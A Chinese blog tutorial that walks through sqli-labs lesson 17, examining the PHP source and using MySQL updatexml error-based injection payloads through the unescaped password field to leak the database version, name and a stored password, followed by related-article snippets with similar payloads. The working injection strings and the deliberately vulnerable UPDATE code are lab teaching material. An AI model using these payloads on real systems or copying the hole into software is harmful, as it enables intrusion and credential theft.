MySQL注入之错误回显

最新推荐文章于 2023-08-23 16:08:52 发布
最新推荐文章于 2023-08-23 16:08:52 发布
阅读量340 收藏
点赞数
分类专栏: 网络安全 文章标签: mysql 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_like_ctrl/article/details/126746412
版权

错误注入是什么?就是让sql查询报错呗,从错误里面找想要的

接下来将以sqli-labs 17为例讲述sql报错注入

  1. 看源代码,为何要用错误注入

开头就来了一份函数

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable

有个check就很让人警觉了,这究竟是是在查哪里呢?继续往下看

$uname=check_input($_POST['uname']);  //好家伙还要检查
$passwd=$_POST['passwd'];

原来是要检查uname.

那要查哪里呢?

再回去看上面的check函数,我们写的uname要过几关呢?


第一关:

$value = substr($value,0,15);

只要输入的uname的前15个字符.

就是别输入太长呗,好说


第二关:

if (get_magic_quotes_gpc()) //注意php.ini里的get_magic_quotes_gpc()有没有开,如果开了就会进行字符检测
	{
		$value = stripslashes($value);  //就给你把各自字符加/转义去掉
	}

有点难度,不能用特殊符号了


第三关:

if (!ctype_digit($value)){ 
	$value = "'" . mysql_real_escape_string($value) . "'";  //直接把MySQL敏感语句给删掉
}

好家伙,直接变成一句长字符了,连点标点符号都没了

不信,直接改源代码去看看变变成了什么

好家伙,这改的连我都认不出来了,看了这个程序员,为了select能够安全查询废了很大心思呢


那怎么办?就没有办法了吗?

那就看看passwd吧,欸?没有进行检测呢?

那就让我们看看,passwd用在那个函数里呢?

	$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";

这么一看,passwd将用于update,这么一来,这个开发者的思路很明确了,先用select查一下这个用户在不在,再用update进行更改,只不过select风险高,不得让开发者不得不谨慎,到了后面的update,开发就懈怠了,不再对passwd进行检测,就让我们利用passwd进行报错注入


  1. 开始利用错误注入

由于是post提交,所以我们要用到chrome里的hackbar

我们进行修改xml报错来达到自己的目的

我们在这里用的是updatexml(doc,xpath,replace)函数

我们也可以用extractvalue(doc,xpath)函数,这个是xml查询语句,查询里面内容

updatexml是MySQL里面的修改xml文件的语句。

其中updatexml()要三个参数:

参数功能
doc要修改的xml
xpath要修改的内容
replace要替换的地方

extractvalue()要两个参数

参数功能
doc要查询的xml文件
xpath要查询的内容

先来个版本检测小试牛刀


uname=admin&&passwd=admin' and updatexml(1 ,concat(0x7e,version(),0x7e),1) --+

concat函数是把里面的字符连接起来

0x7e是字符,在xml里面非法字符

vsesion则是检测数据库版本

直接变成数据库语句

UPDATE users SET password = '11' and updatexml(1,concat(0x7e,version(),0x7e),1)

所以我们能看出来这个报错语句~中间则是mysql版本

#1105 - XPATH syntax error: '~5.6.50-log~'
// 直接告诉你里面的句子不对

好了,那么接下来就很好理解了,我们围绕这个version()进行修改即可

uname=admin&&passwd=admin' and updatexml(1 ,concat(0x7e,database(),0x7e),1) --+

这不直接告诉你是那个数据库了

我们直接在里面来个select吧(还是绕不过select)

uname=admin&passwd=11'  and  updatexml(1,concat(0x7e,(select password from (select password from users limit 7,1) test ),0x7e),1) --+

这就是admin单用户就的密码


从上面的过程,我们可以看出,利用updatexml返回的错误报告的格式,从而得到我们想要的数据

真不想起名TAT
关注
专栏目录
22-1.1 SQL注入的类型之GET基于报错的SQL注入回显分析
weixin_43263566的博客
01-22 154
这个实验环境来学习基于报错的SQL注入。按照实验指导,在URL中修改ID参数值,并观察页面的回显情况。尝试上述探测方法,同时学习如何使用工具(如SQLmap)来辅助注入攻击。我们可以通过修改URL中的ID参数值来探测是否存在注入漏洞。
65.网络安全渗透测试—[SQL注入篇4]—[MySQL+PHP-手工注入详解]
qwsn
08-23 2075
我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 注入前置知识点 1、mysql的三种注释手段: 2、注入时常用的系统信息函数: 3、判断是否存在注入:`and/or逻辑语句` 4、判断字段/列数:`order by排序` 5、联合查询:
基于错误回显的SQL注入整理
12-14
由于复习,停了好几天,换换模式做了一下关于错误回显的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误回显的方法,在这里不带上地址了,请大牛们原谅:P   0x00 关于错误回显   用我自己的话来讲,基于错误回显的sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。   0x01  用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充)   第一种:  基于 rand()  与  group by 的错误  
mysql错误回显注入_基于错误回显的sql注入整理
weixin_36031047的博客
01-19 315
由于复习,停了好几天,今天换换模式做了一下关于错误回显的ctf题目,首先附上题目:here整理了一下网上的一些关于错误回显的方法,在这里就不带上地址了,请大牛们原谅:P0x00 关于错误回显用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧)。0x01 用于错误回显...
【SQL注入-可回显报错注入:简介、相关函数、利用方法
05-29 1993
【SQL注入-可回显
sql注入——报错注入
最新发布
qq_52843411的博客
08-23 263
我们经过查询可知,cms下一共有八个表,因为显示行数有限,所以我们只能利用limit函数一行一行的查询,limit 0,1表示显示从第0行开始往下数1行,即回显第0行。我们从中可以看出,对我们有用的为cms_users表,我们接下来就是要知道cms_users表的结构,有哪些可用的内容。报错注入,我们首先要找到页面的报错点,报错注入是利用页面回显报错信息来显示我们想要查询的信息。1=2时,回显就出错了,我们就要利用这种前后报错回显不同,来进行我们的报错注入。我们将1=1的位置替换为。
SQL注入报错注入
selecthch的博客
06-09 5732
报错注入的前提:页面上没有显示位但是有sql语句执行错误信息输出。mysql_error()函数作用:返回上一个Mysql操作产生的文本错误信息如:      在用phpmysql进行一些增删改查操作的时候,如果数据库在执行的过程 中遇到错误,此时数据库是有错误回显的,但是这个错误回显不会显示在Web应 用页面中的。       如下是php脚本错误信息需要php.ini 中display_er...
mysql回显_SQL回显
weixin_34205814的博客
01-20 1308
DVWA-SQL注入DVWA是一个基于PHPMySQL开发的漏洞测试平台测试环境应用程序: phpStudy(apache,phpmysql)测试程序: firefox, new hacker, burpsuite,sqlmap,中国菜刀一、 SQL注入SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到恶意SQL语句的目的。二、手工注入常规思路1.判...
PHPmysql(手工注入
10-12
- **错误回显注入**:利用系统返回的错误信息,推断出数据库结构和数据。 - **堆叠查询**:在同一个SQL语句中执行多个查询,达到攻击目的。 3. **防止PHP手工注入的策略** - **参数化查询**:使用预编译语句...
SQL注入--回显
qq_27339511的博客
04-10 439
回显注入练习:sqli-labs-Less-3和sqli-labs-Less-4。操作系统:@@version_compile_os。sqli-labs-Less-3闭合点为');sqli-labs-Less-3闭合点为");数据库名字:database()数据库版本:version()数据库用户:user()
mysql错误回显注入_SQL注入之显错注入
weixin_35308770的博客
01-28 780
注入本质?1、 SQL显错注入是最常见的注入。2、 注入攻击的本质,是把用户输入的数据当做SQL语句执行。3、 这里有两个关键条件:第一个是用户能够控制输入。第二个是原本程序要执行的代码,拼接了用户输入的数据,然后进行执行。渗透测试常用函数。1、GROUP_CONCAT(col):返回由属于一组的列值连接组合而成的结果。例如:id=9.9 union select 1,GROUP_CONCAT(...
SQL--报错回显注入
weixin_30412577的博客
08-21 310
1、floor()函数 原理: 利用rand()函数与group()函数的相互冲突,floor()是向下取整函数,floor(9.99)=9.0 语法结构: username=admin' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,你想获取的数据的sql语句)x from information_sc...
mysql报错注入_根据mysql报错进行回显注入的原理是什么?
weixin_31443757的博客
12-23 126
主要是rand和group+by的冲突。在mysql的文档中有这么一句:RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.You cannot use a column with RAND() values in an ...
mysql错误回显注入_MySQL错误回显套公式法注入Zone-h.com.cn
weixin_35766308的博客
01-25 109
该楼层疑似违规已被系统折叠隐藏此楼查看此楼阅读本文前请注意,php+MySQL注入,发生错误回显的有两种,一种是MySQL错误回显,即php提示MySQL语句哪里出错了,也就是能够用本文方法利用的注入,另外一种是php错误回显php显示哪个文件的哪一行出错了,这种情况不在本文的讨论范畴之内。作者:YoCo Smart先看注入点:http://zone-h.com.cn/detail.php?I...
Mysql基于错误回显注入方法
focus on security
07-13 430
接用bwapp来本地演示了,正常页面如下: http://192.168.1.xxx/sqli_2.php?movie=1&action=go 注入参数是movie 0x03 尝试正常的’\’干扰,观察到页面确实报错了,实战中一般看到这种情况,存在注入已经八九不离十了,作为学习, 我们这里还是先按照基础的流程来,正常报错之后,我们还要再确认一遍,这里到底是不是真的存在注入 http://192.168.1.129/sqli_2.php?movie=1\&action=go ..
mysql回显_根据mysql报错进行回显注入的原理是什么?
weixin_39983554的博客
01-20 107
主要是rand和group+by的冲突。在mysql的文档中有这么一句:RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.You cannot use a column with RAND() values in an ...
mysql错误回显注入_基于错误回显的SQL注入整理
weixin_39908985的博客
01-21 151
由于复习,停了好几天,今天换换模式做了一下关于错误回显的ctf题目,首先附上题目:here整理了一下网上的一些关于错误回显的方法,在这里就不带上地址了,请大牛们原谅:P0x00 关于错误回显用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧)。0x01 用于错误回显...
mysql系统数据表如何回显_界面回显数据的两种实现方式
weixin_31969199的博客
01-28 940
先上图:实现这个回显有两种实现方式:第一种:在java后台实现:@Overridepublic Page query( PageQueryParam pageQueryParam,String collegeId) {if (StringUtils.isNotEmpty(collegeId)) {collegeId = collegeId.replaceAll(" GLDWH ", " KKDWH...
网络安全学习笔记——报错注入
just do it
05-12 115
通过页面的报错回显进行注入,出现错误的时候MySQL就会显示错误报错注入网上有资源,实际上在使用的时候也是直接在网上的payload上复制粘贴——报错注入首先要有报错回显点,适用于页面无正常回显
MySQL注入实战:SQLi Labs完全攻略
其中,Less-1到Less-16涵盖了基本的SQL注入技巧,如错误回显、基于时间的盲注、基于布尔的盲注等,让读者理解注入的基本原理和方法。 接下来,手册深入到更复杂的注入技术,包括“Advanced Injection”。这里讨论了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值